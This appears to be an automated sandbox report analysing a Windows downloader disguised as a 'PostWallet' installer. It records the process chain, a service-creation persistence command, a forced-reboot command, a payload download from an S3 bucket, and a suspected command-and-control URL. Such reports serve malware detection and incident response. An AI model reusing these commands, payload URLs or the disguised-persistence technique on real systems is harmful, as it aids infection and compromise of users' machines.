Windows Analysis Report
00023948209303294#U00ac320302282349843984903.exe

Overview

General Information

Sample name: 00023948209303294#U00ac320302282349843984903.exe
(renamed because original name is a hash value)
Original sample name: 00023948209303294320302282349843984903.exe
Analysis ID: 1404607
MD5: 9e1e30202d950ce1f273eb2e8492f39b
SHA1: 4d76edbdb6976aa2acbbe9c4264a6fc9176584ff
SHA256: ddef5168dd82c49304884fd4fb0720a865588dad07f1350ee2eba97cf15ee4c7
Tags: exe
Infos:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contain functionality to detect virtual machines
Machine Learning detection for dropped file
Uses shutdown.exe to shutdown or reboot the system
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 00023948209303294#U00ac320302282349843984903.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC MD5: 9E1E30202D950CE1F273EB2E8492F39B)
    • Update.exe (PID: 3648 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)
      • FilePost?a.exe (PID: 7232 cmdline: "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun MD5: 436CEDFA08F245AD52DD221BEC4480A4)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • FilePost?a.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" MD5: 436CEDFA08F245AD52DD221BEC4480A4)
          • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7448 cmdline: "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • rundll32.exe (PID: 7504 cmdline: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: 889B99C52A60DD49227C5E485A016679)
              • rundll32.exe (PID: 7520 cmdline: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: EF3179D498793BF4234F708D3BE28633)
                • cmd.exe (PID: 7648 cmdline: "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 7700 cmdline: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                • shutdown.exe (PID: 7932 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
                  • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\SquirrelTemp\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\PostWallet\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
3.0.Update.exe.150000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

          System Summary

          Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, CommandLine: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, ProcessId: 7700, ProcessName: sc.exe
          No Snort rule has matched

          AV Detection

          Source: C:\Program Files\Classic Shell\ClassicIEDLL_64.dll, Virustotal: Detection: 17%
          Source: C:\Program Files\Classic Shell\ClassicIE_64.dll, Virustotal: Detection: 18%
          Source: 00023948209303294#U00ac320302282349843984903.exe, Virustotal: Detection: 8%
          Source: C:\Program Files\Classic Shell\ClassicIEDLL_64.dll, Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, Code function: 4_2_6CF61E40 CryptGenRandom,4_2_6CF61E40
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, Code function: 4_2_6CF61E00 CryptReleaseContext,4_2_6CF61E00
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, Code function: 4_2_6CF61F30 CryptGenRandom,CryptReleaseContext,4_2_6CF61F30
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, Code function: 4_2_6CF61910 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,CryptAcquireContextA,___std_exception_copy,4_2_6CF61910
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, Code function: 4_2_6CF61A70 CryptAcquireContextA,GetLastError,CryptReleaseContext,4_2_6CF61A70
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, Code function: 4_2_6CF9E680 CryptReleaseContext,4_2_6CF9E680
          Source: 00023948209303294#U00ac320302282349843984903.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\cache
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\wvtll.zip
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\wvtll.zip1
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIE_64.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicStartMenu.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\PolicyDefinitions.zip
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicExplorer32.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIE_32.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicShellUpdate.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicShellReadme.rtf
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\HISTORY.txt
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\StartMenuHelperL10N.ini
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\StartMenuL10N.ini
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ExplorerL10N.ini
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Full Glass.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Metallic.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Metro.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Metro.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Midnight.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows Basic.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIE_64.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\IE Settings.lnk
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Start Menu Settings.lnk
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Start Screen.lnk
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicShell.chm
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicExplorer64.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\pack01.zip
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\MsMpLics.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\EppManifest.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PostWallet
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, File created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log
          Source: C:\Windows\System32\rundll32.exe, File created: C:\Program Files\Classic Shell\ClassicShellReadme.rtf
          Source: unknown, HTTPS traffic detected: 3.5.232.137:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: 00023948209303294#U00ac320302282349843984903.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, FilePost?a.exe, 00000004.00000002.3858763537.000000006E391000.00000020.00000001.01000000.00000009.sdmp, FilePost?a.exe, 00000008.00000002.3858762476.000000006E391000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup64\ClassicExplorer64.pdb source: ClassicExplorer64.dll.13.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: ClassicIE_64.exe.13.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicStartMenu\Setup64\ClassicStartMenuDLL.pdb source: ClassicStartMenuDLL.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicShellUpdate\Release\ClassicShellUpdate.pdb source: ClassicShellUpdate.exe.13.dr
          Source: Binary string: MpCmdRun.pdb source: ClassicIE_64.exe.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup\ClassicIEDLL_32.pdb source: ClassicIEDLL_32.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup\ClassicIEDLL_32.pdb, source: ClassicIEDLL_32.dll.13.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdbO source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb source: ClassicExplorerSettings.exe.13.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000000.2034521406.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000002.3858109335.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000000.2047188173.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdb source: ClassicExplorer32.dll.13.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb`BXt< source: ClassicExplorerSettings.exe.13.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 00023948209303294#U00ac320302282349843984903.exe
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdb source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000000.2034521406.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000002.3858109335.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000008.00000000.2047188173.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.3.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdbL@ source: ClassicExplorer32.dll.13.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\BasicInformation\x64\Release\BasicSomate.pdb source: ClassicIEDLL_64.dll.13.dr
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, Code function: 4_2_6CF93AFA FindFirstFileExW,4_2_6CF93AFA
          Source: C:\Windows\System32\rundll32.exe, Code function: 13_2_00415080 FindFirstFileW,FindClose,13_2_00415080

          Networking

          Source: C:\Windows\System32\rundll32.exe, Network Connect: 3.5.232.137 443
          Source: Yara match, File source: Update.exe, type: SAMPLE
          Source: Yara match, File source: 3.0.Update.exe.150000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
          Source: Yara match, File source: C:\Users\user\AppData\Local\PostWallet\Update.exe, type: DROPPED
          Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global traffic, HTTP traffic detected:
            GET /bucketTc.zip HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: bucreate203920233.s3.sa-east-1.amazonaws.com
            Connection: Keep-Alive
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\System32\rundll32.exe, Code function: 13_2_00815430 Sleep,SleepEx,URLDownloadToFileW,Sleep,13_2_00815430
          Source: unknown, DNS traffic detected: queries for: bucreate203920233.s3.sa-east-1.amazonaws.com
          Source: ClassicIE_64.dll.13.dr, String found in binary or memory: http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=
          Source: Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, ClassicStartMenuDLL.dll.13.dr, FilePost?a.exe.3.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.digicert.com0L
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.or
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drString found in binary or memory: http://www.classicshell.net
          Source: ClassicExplorer32.dll.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drString found in binary or memory: http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html
          Source: ClassicStartMenuDLL.dll.13.drString found in binary or memory: http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html=~
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/faq/
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drString found in binary or memory: http://www.classicshell.net/files/updates/update_PA
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/forum/viewforum.php
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/forum/viewforum.php?f=11
          Source: ClassicShellReadme.rtf.13.drString found in binary or memory: http://www.classicshell.net/forum/viewforum.php?f=6
          Source: ClassicShellUpdate.exe.13.drString found in binary or memory: http://www.classicshell.netRemindedLangVersionRemindedVersionSoftware
          Source: rundll32.exe, rundll32.exe, 0000000D.00000002.3856964343.0000000000428000.00000020.00000001.01000000.0000000D.sdmp, Main.dll.8.dr, ClassicIE_64.dll.13.drString found in binary or memory: http://www.delphiforfun.org/
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://www.vmware.com/0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: http://www.vmware.com/0/
          Source: ClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drString found in binary or memory: http://www.yoursite.com
          Source: Update.exeString found in binary or memory: https://api.github.com/#
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/R
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3859934007.000001D5874DF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip=
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipM
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipx
          Source: Update.exeString found in binary or memory: https://github.com/myuser/myrepo
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, ClassicStartMenuDLL.dll.13.dr, FilePost?a.exe.3.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.dr, ClassicExplorerSettings.exe.13.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknown HTTPS traffic detected: 3.5.232.137:443 -> 192.168.2.5:49705 version: TLS 1.2

          System Summary

          Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
